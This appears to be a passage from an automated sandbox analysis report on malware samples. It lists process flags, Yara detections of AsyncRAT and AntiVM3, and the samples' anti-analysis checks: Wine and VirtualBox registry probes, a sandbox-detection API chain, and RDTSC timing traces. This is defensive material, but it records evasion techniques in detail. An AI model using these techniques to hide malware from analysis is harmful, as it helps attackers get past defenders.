Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AD13C second address: 4AD142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AD142 second address: 4AD162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10A35F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BC10A3603h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC2D1 second address: 4AC2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F5BC10B7098h 0x0000000b pushad 0x0000000c js 00007F5BC10B7096h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F5BC10B7096h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC2F2 second address: 4AC305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007F5BC10A360Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC305 second address: 4AC309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC309 second address: 4AC30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC459 second address: 4AC45F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC59C second address: 4AC5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F5BC10A35FEh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5BC10A35F6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F5BC10A35FEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC729 second address: 4AC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0A7 second address: 4AF0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0B1 second address: 4AF0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0B5 second address: 4AF0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F5BC10A360Fh 0x0000000f push ebx 0x00000010 jmp 00007F5BC10A3607h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a ja 00007F5BC10A3604h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0FD second address: 4AF107 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10B709Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF206 second address: 4AF20B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF20B second address: 4AF269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 298AC1A2h 0x0000000e mov edx, dword ptr [ebp+122D33FEh] 0x00000014 push 00000003h 0x00000016 mov di, 0B90h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F5BC10B7098h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov esi, dword ptr [ebp+122D353Ah] 0x0000003c mov si, 1EC8h 0x00000040 push 00000003h 0x00000042 sub di, E20Bh 0x00000047 push 49B6E6D2h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F5BC10B709Bh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF269 second address: 4AF26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF26E second address: 4AF296 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10B709Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7649192Eh 0x00000011 mov edx, 2B29BBECh 0x00000016 lea ebx, dword ptr [ebp+12453FD8h] 0x0000001c push eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF3F0 second address: 4AF3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF3F4 second address: 4AF3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF3FE second address: 4AF422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF46C second address: 4AF475 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4C24FD second address: 4C2503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE5E4 second address: 4CE609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F5BC10B70A3h 0x0000000d jnc 00007F5BC10B7096h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE609 second address: 4CE617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10A35F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE8AC second address: 4CE8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE8B2 second address: 4CE8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1A3 second address: 4CF1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1A9 second address: 4CF1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1AD second address: 4CF1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1B1 second address: 4CF1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007F5BC10A35F6h 0x0000000d jnl 00007F5BC10A35F6h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1C5 second address: 4CF1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F5BC10B7096h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1D9 second address: 4CF1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF46C second address: 4CF48E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BC10B70A4h 0x0000000d js 00007F5BC10B7096h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 493A8E second address: 493AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 493AA6 second address: 493AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 493AAA second address: 493AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jne 00007F5BC10A35F6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF61E second address: 4CF633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10B709Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A6250 second address: 4A6256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A6256 second address: 4A6260 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BC10B7096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A6260 second address: 4A629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F5BC10A35F6h 0x0000000d jc 00007F5BC10A35F6h 0x00000013 ja 00007F5BC10A35F6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007F5BC10A3606h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A629D second address: 4A62B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A3h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 49BFA5 second address: 49BFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC292 second address: 4DC29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC29C second address: 4DC2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC866 second address: 4DC873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F5BC10B7096h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC873 second address: 4DC87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC9F7 second address: 4DC9FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE29C second address: 4DE2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2A0 second address: 4DE2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2A6 second address: 4DE2CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5BC10A35FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F5BC10A35F6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2CA second address: 4DE2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007F5BC10B709Eh 0x0000000f je 00007F5BC10B7098h 0x00000015 push edi 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2EB second address: 4DE2F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE40E second address: 4DE414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE57B second address: 4DE585 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE585 second address: 4DE589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE829 second address: 4DE82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
